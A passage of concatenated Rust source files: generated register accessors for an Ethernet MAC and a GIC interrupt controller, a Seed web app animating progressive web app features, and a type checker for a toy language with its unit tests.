#[doc = "Bit 14 - MAC Speed"]
#[inline(always)]
pub fn fes(&self) -> FES_R {
FES_R::new(((self.bits >> 14) & 1) != 0)
}
#[doc = "Bit 16 - Jumbo Packet Enable"]
#[inline(always)]
pub fn je(&self) -> JE_R {
JE_R::new(((self.bits >> 16) & 1) != 0)
}
#[doc = "Bit 17 - Jabber Disable"]
#[inline(always)]
pub fn jd(&self) -> JD_R {
JD_R::new(((self.bits >> 17) & 1) != 0)
}
#[doc = "Bit 19 - Watchdog Disable"]
#[inline(always)]
pub fn wd(&self) -> WD_R {
WD_R::new(((self.bits >> 19) & 1) != 0)
}
#[doc = "Bit 20 - Automatic Pad or CRC Stripping"]
#[inline(always)]
pub fn acs(&self) -> ACS_R {
ACS_R::new(((self.bits >> 20) & 1) != 0)
}
#[doc = "Bit 21 - CRC stripping for Type packets"]
#[inline(always)]
pub fn cst(&self) -> CST_R {
CST_R::new(((self.bits >> 21) & 1) != 0)
}
#[doc = "Bit 22 - IEEE 802.3as Support for 2K Packets"]
#[inline(always)]
pub fn s2kp(&self) -> S2KP_R {
S2KP_R::new(((self.bits >> 22) & 1) != 0)
}
#[doc = "Bit 23 - Giant Packet Size Limit Control Enable"]
#[inline(always)]
pub fn gpslce(&self) -> GPSLCE_R {
GPSLCE_R::new(((self.bits >> 23) & 1) != 0)
}
#[doc = "Bits 24:26 - Inter-Packet Gap"]
#[inline(always)]
pub fn ipg(&self) -> IPG_R {
IPG_R::new(((self.bits >> 24) & 7) as u8)
}
#[doc = "Bit 27 - Checksum Offload"]
#[inline(always)]
pub fn ipc(&self) -> IPC_R {
IPC_R::new(((self.bits >> 27) & 1) != 0)
}
#[doc = "Bits 28:30 - Source Address Insertion or Replacement Control"]
#[inline(always)]
pub fn sarc(&self) -> SARC_R {
SARC_R::new(((self.bits >> 28) & 7) as u8)
}
#[doc = "Bit 31 - ARP Offload Enable"]
#[inline(always)]
pub fn arpen(&self) -> ARPEN_R {
ARPEN_R::new(((self.bits >> 31) & 1) != 0)
}
}
impl W {
#[doc = "Bit 0 - Receiver Enable"]
#[inline(always)]
#[must_use]
pub fn re(&mut self) -> RE_W<MACCR_SPEC, 0> {
RE_W::new(self)
}
#[doc = "Bit 1 - Transmitter Enable"]
#[inline(always)]
#[must_use]
pub fn te(&mut self) -> TE_W<MACCR_SPEC, 1> {
TE_W::new(self)
}
#[doc = "Bits 2:3 - Preamble Length for Transmit Packets"]
#[inline(always)]
#[must_use]
pub fn prelen(&mut self) -> PRELEN_W<MACCR_SPEC, 2> {
PRELEN_W::new(self)
}
#[doc = "Bit 4 - Deferral Check"]
#[inline(always)]
#[must_use]
pub fn dc(&mut self) -> DC_W<MACCR_SPEC, 4> {
DC_W::new(self)
}
#[doc = "Bits 5:6 - Back-Off Limit"]
#[inline(always)]
#[must_use]
pub fn bl(&mut self) -> BL_W<MACCR_SPEC, 5> {
BL_W::new(self)
}
#[doc = "Bit 8 - Disable Retry"]
#[inline(always)]
#[must_use]
pub fn dr(&mut self) -> DR_W<MACCR_SPEC, 8> {
DR_W::new(self)
}
#[doc = "Bit 9 - Disable Carrier Sense During Transmission"]
#[inline(always)]
#[must_use]
pub fn dcrs(&mut self) -> DCRS_W<MACCR_SPEC, 9> {
DCRS_W::new(self)
}
#[doc = "Bit 10 - Disable Receive Own"]
#[inline(always)]
#[must_use]
pub fn do_(&mut self) -> DO_W<MACCR_SPEC, 10> {
DO_W::new(self)
}
#[doc = "Bit 11 - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
#[inline(always)]
#[must_use]
pub fn ecrsfd(&mut self) -> ECRSFD_W<MACCR_SPEC, 11> {
ECRSFD_W::new(self)
}
#[doc = "Bit 12 - Loopback Mode"]
#[inline(always)]
#[must_use]
pub fn lm(&mut self) -> LM_W<MACCR_SPEC, 12> {
LM_W::new(self)
}
#[doc = "Bit 13 - Duplex Mode"]
#[inline(always)]
#[must_use]
pub fn dm(&mut self) -> DM_W<MACCR_SPEC, 13> {
DM_W::new(self)
}
#[doc = "Bit 14 - MAC Speed"]
#[inline(always)]
#[must_use]
pub fn fes(&mut self) -> FES_W<MACCR_SPEC, 14> {
FES_W::new(self)
}
#[doc = "Bit 16 - Jumbo Packet Enable"]
#[inline(always)]
#[must_use]
pub fn je(&mut self) -> JE_W<MACCR_SPEC, 16> {
JE_W::new(self)
}
#[doc = "Bit 17 - Jabber Disable"]
#[inline(always)]
#[must_use]
pub fn jd(&mut self) -> JD_W<MACCR_SPEC, 17> {
JD_W::new(self)
}
#[doc = "Bit 19 - Watchdog Disable"]
#[inline(always)]
#[must_use]
pub fn wd(&mut self) -> WD_W<MACCR_SPEC, 19> {
WD_W::new(self)
}
#[doc = "Bit 20 - Automatic Pad or CRC Stripping"]
#[inline(always)]
#[must_use]
pub fn acs(&mut self) -> ACS_W<MACCR_SPEC, 20> {
ACS_W::new(self)
}
#[doc = "Bit 21 - CRC stripping for Type packets"]
#[inline(always)]
#[must_use]
pub fn cst(&mut self) -> CST_W<MACCR_SPEC, 21> {
CST_W::new(self)
}
#[doc = "Bit 22 - IEEE 802.3as Support for 2K Packets"]
#[inline(always)]
#[must_use]
pub fn s2kp(&mut self) -> S2KP_W<MACCR_SPEC, 22> {
S2KP_W::new(self)
}
#[doc = "Bit 23 - Giant Packet Size Limit Control Enable"]
#[inline(always)]
#[must_use]
pub fn gpslce(&mut self) -> GPSLCE_W<MACCR_SPEC, 23> {
GPSLCE_W::new(self)
}
#[doc = "Bits 24:26 - Inter-Packet Gap"]
#[inline(always)]
#[must_use]
pub fn ipg(&mut self) -> IPG_W<MACCR_SPEC, 24> {
IPG_W::new(self)
}
#[doc = "Bit 27 - Checksum Offload"]
#[inline(always)]
#[must_use]
pub fn ipc(&mut self) -> IPC_W<MACCR_SPEC, 27> {
IPC_W::new(self)
}
#[doc = "Bits 28:30 - Source Address Insertion or Replacement Control"]
#[inline(always)]
#[must_use]
pub fn sarc(&mut self) -> SARC_W<MACCR_SPEC, 28> {
SARC_W::new(self)
}
#[doc = "Bit 31 - ARP Offload Enable"]
#[inline(always)]
#[must_use]
pub fn arpen(&mut self) -> ARPEN_W<MACCR_SPEC, 31> {
ARPEN_W::new(self)
}
#[doc = "Writes raw bits to the register."]
#[inline(always)]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
}
#[doc = "Operating mode configuration register\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`maccr::R`](R). You can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`maccr::W`](W). You can also [`modify`](crate::generic::Reg::modify) this register. See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct MACCR_SPEC;
impl crate::RegisterSpec for MACCR_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [`maccr::R`](R) reader structure"]
impl crate::Readable for MACCR_SPEC {}
#[doc = "`write(|w| ..)` method takes [`maccr::W`](W) writer structure"]
impl crate::Writable for MACCR_SPEC {
const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets MACCR to value 0"]
impl crate::Resettable for MACCR_SPEC {
const RESET_VALUE: Self::Ux = 0;
}
|
// (Lines like the one below ignore selected Clippy rules
// - it's useful when you want to check your code with `cargo make verify`
// but some rules are too "annoying" or are not applicable for your case.)
#![allow(clippy::wildcard_imports)]
use seed::{prelude::*, *};
// ------ ------
// Init
// ------ ------
// `init` describes what should happen when your app started.
fn init(_: Url, orders: &mut impl Orders<Msg>) -> Model {
let elements = [
"title".to_string(),
"installable".to_string(),
"offline".to_string(),
"responsive".to_string(),
"push".to_string(),
"notifications".to_string(),
"native-features".to_string(),
"more".to_string(),
"button".to_string(),
];
let model = Model {
visible: elements
.iter()
.map(|e| ((*e).clone(), true))
.collect::<IndexMap<_, _>>(),
toh: elements
.iter()
.map(|e| ((*e).clone(), None))
.collect::<IndexMap<_, _>>(),
};
orders.perform_cmd(async { Msg::StartOver });
model
}
// ------ ------
// Model
// ------ ------
// `Model` describes our app state.
struct Model {
visible: IndexMap<String, bool>,
toh: IndexMap<String, Option<CmdHandle>>, //timeout handle hashmap
}
// ------ ------
// Update
// ------ ------
// `Msg` describes the different events you can modify state with.
enum Msg {
StartOver,
OnTimer(String),
}
// `update` describes how to handle each `Msg`.
fn update(msg: Msg, model: &mut Model, orders: &mut impl Orders<Msg>) {
match msg {
Msg::StartOver => {
let mut ms = 1000;
model.visible.iter_mut().for_each(|(_k, v)| *v = false);
for key in model.visible.keys() {
let element = key.clone().to_string();
model.toh[key] = Some(
orders.perform_cmd_with_handle(cmds::timeout(ms, || Msg::OnTimer(element))),
);
ms += 1000
}
}
Msg::OnTimer(element) => {
model.visible[&element] = true;
model.toh[&element] = None;
}
}
}
// ------ ------
// View
// ------ ------
// (Remove the line below once your `Model` become more complex.)
fn view(model: &Model) -> Vec<Node<Msg>> {
nodes![
div![
C!["title", IF!(model.visible["title"] => "animate-in")],
h1!["Progressive Web Apps"],
],
div![
C!["content"],
div![
C![
"course-feature",
IF!(model.visible["installable"] => "animate-in")
],
p!["They're installable (without and App Store)!"],
attrs! { At::Id => "installable"},
],
div![
C![
"course-feature",
IF!(model.visible["offline"] => "animate-in")
],
p!["They can work offline!"],
attrs! { At::Id => "offline"},
],
div![
C![
"course-feature",
IF!(model.visible["responsive"] => "animate-in")
],
p!["They look good on any device"],
attrs! { At::Id => "responsive"},
],
div![
C!["course-feature", IF!(model.visible["push"] => "animate-in")],
p!["You can receive Push Messages..."],
attrs! { At::Id => "push"},
],
div![
C![
"course-feature",
IF!(model.visible["notifications"] => "animate-in")
],
p!["...and show Notifications"],
attrs! { At::Id => "notifications"},
],
div![
C![
"course-feature",
IF!(model.visible["native-features"] => "animate-in")
],
p!["PWAs can access native device features like the Camera"],
attrs! { At::Id => "native-features"},
],
div![
C!["course-feature", IF!(model.visible["more"] => "animate-in")],
p!["And so much more!"],
attrs! { At::Id => "more"},
],
],
div![
C!["start-over", IF!(model.visible[4] => "animate-in")],
button![
C!["button", IF!(model.visible["button"] => "animate-in")],
"Start Again!"
],
ev(Ev::Click, |_| Msg::StartOver),
]
]
}
// ------ ------
// Start
// ------ ------
// (This function is invoked by `init` function in `index.html`.)
#[wasm_bindgen(start)]
pub fn start() {
App::start("app", init, update, view);
}
|
use ast::abstract_syntax_tree::Ast;
use ast::type_info::TypeInfo;
use std::collections::HashMap;
use ast::s_expression::SExpression;
#[derive(Debug, Clone, PartialEq)]
pub enum TypeError {
TypeMismatch(TypeInfo, TypeInfo),
UnsupportedOperation(TypeInfo, TypeInfo),
LhsNotAnIdentifier,
IdentifierDoesntExist(String),
MalformedAST,
// Mutability
CanNotAssignToConstVariable,
CanNotRedeclareConst,
VariableDoesNotExist, // Remove?
IsNotAVariable, // Remove?
CanNotRedeclareFunction,
CanNotRedeclareStructType
}
use ast::datatype::Datatype;
#[derive(Debug, Clone, PartialEq)]
pub enum Mutability {
Mutable(TypeInfo),
Immutable(TypeInfo)
}
impl From<Datatype> for Mutability {
fn from(datatype: Datatype) -> Mutability {
Mutability::Mutable(TypeInfo::from(datatype))
}
}
impl Mutability {
fn get_type(self) -> TypeInfo {
match self {
Mutability::Mutable(ti) => ti,
Mutability::Immutable(ti) => ti
}
}
fn from_type_result(type_result: TypeResult) -> MutabilityResult {
match type_result {
Ok(ti) => Ok(Mutability::Mutable(ti)),
Err(e) => Err(e)
}
}
}
pub type TypeResult = Result<TypeInfo, TypeError>;
pub type MutabilityResult = Result<Mutability, TypeError>;
pub type TypeStore = HashMap<String, Mutability>;
impl Ast {
/// Checks for both Type errors as well as mutability conflicts.
pub fn check_types( &self, mut type_store: &mut TypeStore ) -> MutabilityResult {
match *self {
Ast::SExpr(ref sexpr) => {
match *sexpr {
SExpression::Add(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
+ rhs.check_types(type_store)?.get_type()
)
}
SExpression::Subtract(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
- rhs.check_types(type_store)?.get_type()
)
}
SExpression::Multiply(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
* rhs.check_types(type_store)?.get_type()
)
}
SExpression::Divide(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
/ rhs.check_types(type_store)?.get_type()
)
}
SExpression::Modulo(ref lhs, ref rhs) => {
Mutability::from_type_result(
lhs.check_types(type_store)?.get_type()
% rhs.check_types(type_store)?.get_type()
)
}
SExpression::Equals(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::NotEquals(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::GreaterThan(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LessThan(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::GreaterThanOrEqual(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LessThanOrEqual(_, _ ) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LogicalAnd(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
SExpression::LogicalOr(_, _) => {
Ok(Mutability::Mutable(TypeInfo::Bool))
}
// TODO, consider moving mutability into this checker? I believe it can be done.
SExpression::VariableDeclaration {
ref identifier,
ref ast,
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
match *lhs_mutability {
Mutability::Mutable(ref lhs_type) => {
// Re declaring a variable allows it to change types
}
Mutability::Immutable(_) => {
error = Some(TypeError::CanNotRedeclareConst)
}
}
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Mutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::ConstDeclaration {
ref identifier,
ref ast,
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareConst)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::DeclareFunction {
ref identifier,
ref function_datatype,
} => {
let rhs_mutability: Mutability = function_datatype.check_types(type_store)?;
// TODO, should I check if the righthand side is a function datatype???
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareFunction)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::StructDeclaration {
ref identifier,
ref struct_type_info,
} => {
let rhs_mutability: Mutability = struct_type_info.check_types(type_store)?;
// TODO, should I check if the righthand side is a struct type info?
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
// If the variable is found, its mutability needs to be checked
Some(lhs_mutability) => {
error = Some(TypeError::CanNotRedeclareStructType)
}
// If the variable doesn't exist yet fall through to not return an error
None => {}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Immutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::TypeAssignment {
identifier: ref lhs,
type_info: ref rhs,
} |
SExpression::FieldAssignment {
identifier: ref lhs,
ast: ref rhs,
} => {
let rhs_type = rhs.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = ** lhs {
type_store.insert(ident.clone(), rhs_type.clone());
Ok(rhs_type)
} else {
Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::Assignment {
ref identifier,
ref ast
} => {
let rhs_mutability: Mutability = ast.check_types(type_store)?;
if let Ast::ValueIdentifier(ref ident) = **identifier {
// hold errors that may be generated when checking types
let mut error: Option<TypeError> = None;
match type_store.get(ident) {
Some(lhs_mutability) => {
match *lhs_mutability {
Mutability::Mutable(_) => {
if lhs_mutability.clone().get_type() != rhs_mutability.clone().get_type() {
error = Some(TypeError::TypeMismatch(lhs_mutability.clone().get_type(), rhs_mutability.clone().get_type()))
}
}
Mutability::Immutable(_) => {
error = Some(TypeError::CanNotAssignToConstVariable)
}
}
}
None => {
error = Some(TypeError::IdentifierDoesntExist(ident.clone()))
}
}
if let Some(e) = error {
return Err(e)
} else {
type_store.insert(ident.clone(), Mutability::Mutable(rhs_mutability.clone().get_type()));
Ok(rhs_mutability)
}
} else {
return Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::Loop {
ref conditional,
ref body,
} => {
let _ = conditional.check_types(type_store)?; // Possibly return an error on checking the conditional's type.
body.check_types(type_store)
}
SExpression::AccessArray {
ref identifier,
ref index
} => {
if let Ast::ValueIdentifier(ref ident) = **identifier {
match type_store.get(ident) {
Some(lhs_type) => {
if lhs_type.clone().get_type() == TypeInfo::Array(Box::new(TypeInfo::Any)) {
return Ok(lhs_type.clone()) // The lhs will give a specific Array type, ie. Array<Number> vs the "rhs" in this case which is just Array<Any>
} else {
return Err(TypeError::TypeMismatch(lhs_type.clone().get_type(), TypeInfo::Array(Box::new(TypeInfo::Any)) ))
}
}
None => {
return Err(TypeError::IdentifierDoesntExist(ident.clone()))
}
}
} else {
return Err(TypeError::LhsNotAnIdentifier)
}
}
SExpression::GetArrayLength(_) => {
Ok(Mutability::Mutable(TypeInfo::Number))
}
SExpression::Range { start: ref _start, end: ref _end} => {
Ok(Mutability::Mutable(TypeInfo::Array(Box::new(TypeInfo::Number))))
}
SExpression::ExecuteFn {
ref identifier,
ref parameters
} => {
let parameter_types: Vec<TypeInfo> = match **parameters {
Ast::ExpressionList(ref expressions) => {
let mut cloned_type_store = type_store.clone();
let mut evaluated_expressions: Vec<TypeInfo> = vec![];
for e in expressions {
match e.check_types(&mut cloned_type_store) {
Ok(dt) => evaluated_expressions.push(dt.get_type()),
Err(err) => return Err(err),
}
}
evaluated_expressions
}
_ => return Err(TypeError::MalformedAST)
};
if let Ast::ValueIdentifier(ref id) = **identifier {
if let Some(ref possible_fn_datatype) = type_store.get(id) {
if let TypeInfo::Function { ref parameters, ref return_type } = (*possible_fn_datatype).clone().get_type() {
let parameter_matches: Vec<TypeResult> = parameter_types
.iter()
.zip( parameters.iter() )
.map( |(input_type, expected_type)| {
if input_type == expected_type {
Ok(input_type.clone())
} else {
return Err(TypeError::TypeMismatch(input_type.clone(), expected_type.clone()))
}
} ).collect();
for e in parameter_matches {
if let Err(type_error) = e {
return Err(type_error)
}
}
return Ok(Mutability::Mutable(*return_type.clone()))
} {
Err(TypeError::MalformedAST)
}
} else {
Err(TypeError::IdentifierDoesntExist(id.clone()))
}
} else {
Err(TypeError::IsNotAVariable)
}
}
SExpression::CreateStruct {
ref identifier,
ref struct_datatype
} => {
if let Ast::ValueIdentifier(ref id) = ** identifier {
if let Some(existing_struct_type) = type_store.get(id){
if let TypeInfo::Struct{ ref map } = existing_struct_type.clone().get_type() {
}
}
}
unimplemented!()
}
SExpression::AccessStructField {
ref identifier,
ref field_identifier
} => {
unimplemented!()
}
SExpression::Print(_) => {
return Ok(Mutability::Mutable(TypeInfo::String))
}
SExpression::Include(_) => {
Ok(Mutability::Mutable(TypeInfo::Any)) // TODO Verify what the include operator returns, consider a No-return type
}
SExpression::Invert(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Negate(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Increment(ref parameter) => {
parameter.check_types(type_store)
}
SExpression::Decrement(ref parameter) => {
parameter.check_types(type_store)
}
}
}
Ast::Literal(ref datatype) => {
Ok(Mutability::Mutable(TypeInfo::from( datatype.clone() )))
}
Ast::ValueIdentifier(ref identifier) => {
// if the typestore has the value
if let Some(stored_mutability_and_type) = type_store.get(identifier) {
Ok(stored_mutability_and_type.clone())
} else {
return Ok(Mutability::Mutable(TypeInfo::Any)); // Hasn't been initialized
}
}
Ast::ExpressionList(ref expressions) => {
let mut checked_type: Mutability = Mutability::Mutable(TypeInfo::Any);
for e in expressions {
checked_type = e.check_types(type_store)?;
}
Ok(checked_type)
}
_ => unimplemented!("AST")
}
}
}
#[cfg(test)]
mod test {
use super::*;
use parser::program;
use nom::IResult;
#[test]
fn throw_error_on_type_mismatch_assignment() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := 5
a := "Hello"
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String), ast.check_types(&mut map).unwrap_err() as TypeError);
}
#[test]
/// Reassigning the variable will allow its type to change.
fn different_type_reassignment() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := 5
let a := "Hello"
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::String, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn throw_error_on_type_mismatch_addition_assignment() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := 5
a := "Hello" + 5
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String), ast.check_types(&mut map).unwrap_err());
}
#[test]
fn throw_error_on_type_mismatch_self_addition_assignment() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := 5
a := "Hello" + a
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::TypeMismatch(TypeInfo::Number, TypeInfo::String), ast.check_types(&mut map).unwrap_err());
}
#[test]
fn number_is_number() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
40
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::Number, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn string_is_string() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
"Hello"
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::String, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn assignment_is_of_type_string() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := "Hello"
a
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::String, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn number_plus_float_plus_number_is_a_float() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
5 + 10.0 + 2
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::Float, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn array_is_array() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := [5]
a := [6]
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::Array(Box::new(TypeInfo::Number)), ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn array_type_mismatch() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
let a := [5]
a := ["Hello"]
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::TypeMismatch(TypeInfo::Array(Box::new(TypeInfo::Number)), TypeInfo::Array(Box::new(TypeInfo::String))),
ast.check_types(&mut map).unwrap_err());
}
#[test]
fn throw_error_on_unsupported_division() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
"Hello" / 5
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::UnsupportedOperation(TypeInfo::String, TypeInfo::Number), ast.check_types(&mut map).unwrap_err());
}
#[test]
fn throw_error_on_function_execution() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
fn my_function() -> Number {
5
}
let a := "Hello"
a := my_function()
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::TypeMismatch(TypeInfo::String, TypeInfo::Number), ast.check_types(&mut map).unwrap_err());
}
#[test]
fn type_check_function_execution() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
fn my_function() -> Number {
5
}
let a := 7
a := my_function()
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeInfo::Number, ast.check_types(&mut map).unwrap().get_type());
}
#[test]
fn mutability_const_redeclaration_throws_error() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
const a := 5
let a := 4
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::CanNotRedeclareConst, ast.check_types(&mut map).unwrap_err());
}
#[test]
fn mutability_const_reassignment_throws_error() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
const a := 5
a := 4
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::CanNotAssignToConstVariable, ast.check_types(&mut map).unwrap_err());
}
#[test]
fn mutability_function_reassignment_throws_error() {
let mut map: TypeStore = TypeStore::new();
let input_string = r##"
fn a() -> Number { 7 }
a := 4
"##;
let (_, ast) = match program(input_string.as_bytes()) {
IResult::Done(rest, v) => (rest, v),
IResult::Error(e) => panic!("{}", e),
_ => panic!(),
};
assert_eq!(TypeError::CanNotAssignToConstVariable, ast.check_types(&mut map).unwrap_err());
}
} |
pub mod file;
pub mod error;
|
#[doc = "Register `GICD_ICPENDR8` reader"]
pub type R = crate::R<GICD_ICPENDR8_SPEC>;
#[doc = "Register `GICD_ICPENDR8` writer"]
pub type W = crate::W<GICD_ICPENDR8_SPEC>;
#[doc = "Field `ICPENDR8` reader - ICPENDR8"]
pub type ICPENDR8_R = crate::FieldReader<u32>;
#[doc = "Field `ICPENDR8` writer - ICPENDR8"]
pub type ICPENDR8_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 32, O, u32>;
impl R {
#[doc = "Bits 0:31 - ICPENDR8"]
#[inline(always)]
pub fn icpendr8(&self) -> ICPENDR8_R {
ICPENDR8_R::new(self.bits)
}
}
impl W {
#[doc = "Bits 0:31 - ICPENDR8"]
#[inline(always)]
#[must_use]
pub fn icpendr8(&mut self) -> ICPENDR8_W<GICD_ICPENDR8_SPEC, 0> {
ICPENDR8_W::new(self)
}
#[doc = "Writes raw bits to the register."]
#[inline(always)]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
}
#[doc = "For interrupts ID\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`gicd_icpendr8::R`](R). You can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`gicd_icpendr8::W`](W). You can also [`modify`](crate::generic::Reg::modify) this register. See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct GICD_ICPENDR8_SPEC;
impl crate::RegisterSpec for GICD_ICPENDR8_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [`gicd_icpendr8::R`](R) reader structure"]
impl crate::Readable for GICD_ICPENDR8_SPEC {}
#[doc = "`write(|w| ..)` method takes [`gicd_icpendr8::W`](W) writer structure"]
impl crate::Writable for GICD_ICPENDR8_SPEC {
const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets GICD_ICPENDR8 to value 0"]
